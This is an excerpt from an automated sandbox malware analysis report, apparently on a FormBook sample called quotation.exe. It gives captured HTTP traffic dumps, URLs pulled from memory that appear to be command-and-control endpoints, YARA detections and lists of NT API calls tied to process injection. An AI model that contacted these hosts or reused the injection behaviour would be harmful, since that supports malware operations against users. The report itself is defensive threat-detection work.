6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:16:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:16:27 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004FAC000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000003CFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4
                Source: quotation.exe, 00000000.00000002.2082562762.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000003FF8000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002D48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5
                Source: gkTgnrvdOG.exe, 00000007.00000002.4522340469.0000000004ADB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org
                Source: gkTgnrvdOG.exe, 00000007.00000002.4522340469.0000000004ADB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org/lqxd/
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/px.js?ch=1
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/px.js?ch=2
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/sk-logabpstatus.php?a=TWtMZ29kWWVvSVBIWGlFSGk5UEV4UFpDeUlmS21GbHVCU
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004964000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000036B4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.000000000418A000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002EDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000003CD4000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002A24000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675200151.000000000B774000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2YY
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfQu
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033vS
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SearchProtocolHost.exe, 00000006.00000003.2564570064.0000000007CD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: quotation.exe
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0042CAB3 NtClose,3_2_0042CAB3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2B60 NtClose,LdrInitializeThunk,3_2_012F2B60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_012F2DF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_012F2C70
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F35C0 NtCreateMutant,LdrInitializeThunk,3_2_012F35C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F4340 NtSetContextThread,3_2_012F4340
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F4650 NtSuspendThread,3_2_012F4650
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2BA0 NtEnumerateValueKey,3_2_012F2BA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2B80 NtQueryInformationFile,3_2_012F2B80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2BE0 NtQueryValueKey,3_2_012F2BE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2BF0 NtAllocateVirtualMemory,3_2_012F2BF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2AB0 NtWaitForSingleObject,3_2_012F2AB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2AF0 NtWriteFile,3_2_012F2AF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2AD0 NtReadFile,3_2_012F2AD0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2D30 NtUnmapViewOfSection,3_2_012F2D30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2D00 NtSetInformationFile,3_2_012F2D00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2D10 NtMapViewOfSection,3_2_012F2D10
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2DB0 NtEnumerateKey,3_2_012F2DB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2DD0 NtDelayExecution,3_2_012F2DD0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2C00 NtQueryInformationProcess,3_2_012F2C00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2C60 NtCreateKey,3_2_012F2C60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2CA0 NtQueryInformationToken,3_2_012F2CA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2CF0 NtOpenProcess,3_2_012F2CF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2CC0 NtQueryVirtualMemory,3_2_012F2CC0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2F30 NtCreateSection,3_2_012F2F30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2F60 NtCreateProcessEx,3_2_012F2F60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2FA0 NtQuerySection,3_2_012F2FA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2FB0 NtResumeThread,3_2_012F2FB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2F90 NtProtectVirtualMemory,3_2_012F2F90
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2FE0 NtCreateFile,3_2_012F2FE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2E30 NtWriteVirtualMemory,3_2_012F2E30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2EA0 NtAdjustPrivilegesToken,3_2_012F2EA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2E80 NtReadVirtualMemory,3_2_012F2E80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2EE0 NtQueueApcThread,3_2_012F2EE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3010 NtOpenDirectoryObject,3_2_012F3010
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3090 NtSetValueKey,3_2_012F3090
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F39B0 NtGetContextThread,3_2_012F39B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3D10 NtOpenProcessToken,3_2_012F3D10
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3D70 NtOpenThread,3_2_012F3D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03244340 NtSetContextThread,LdrInitializeThunk,6_2_03244340
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03244650 NtSuspendThread,LdrInitializeThunk,6_2_03244650
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242B60 NtClose,LdrInitializeThunk,6_2_03242B60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03242BA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03242BE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03242BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242AF0 NtWriteFile,LdrInitializeThunk,6_2_03242AF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242AD0 NtReadFile,LdrInitializeThunk,6_2_03242AD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242F30 NtCreateSection,LdrInitializeThunk,6_2_03242F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242FB0 NtResumeThread,LdrInitializeThunk,6_2_03242FB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242FE0 NtCreateFile,LdrInitializeThunk,6_2_03242FE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03242E80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03242EE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03242D30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03242D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03242DF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242DD0 NtDelayExecution,LdrInitializeThunk,6_2_03242DD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242C60 NtCreateKey,LdrInitializeThunk,6_2_03242C60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03242C70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03242CA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032435C0 NtCreateMutant,LdrInitializeThunk,6_2_032435C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032439B0 NtGetContextThread,LdrInitializeThunk,6_2_032439B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242B80 NtQueryInformationFile,6_2_03242B80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242AB0 NtWaitForSingleObject,6_2_03242AB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242F60 NtCreateProcessEx,6_2_03242F60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242FA0 NtQuerySection,6_2_03242FA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242F90 NtProtectVirtualMemory,6_2_03242F90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242E30 NtWriteVirtualMemory,6_2_03242E30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242EA0 NtAdjustPrivilegesToken,6_2_03242EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242D00 NtSetInformationFile,6_2_03242D00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242DB0 NtEnumerateKey,6_2_03242DB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242C00 NtQueryInformationProcess,6_2_03242C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242CF0 NtOpenProcess,6_2_03242CF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242CC0 NtQueryVirtualMemory,6_2_03242CC0
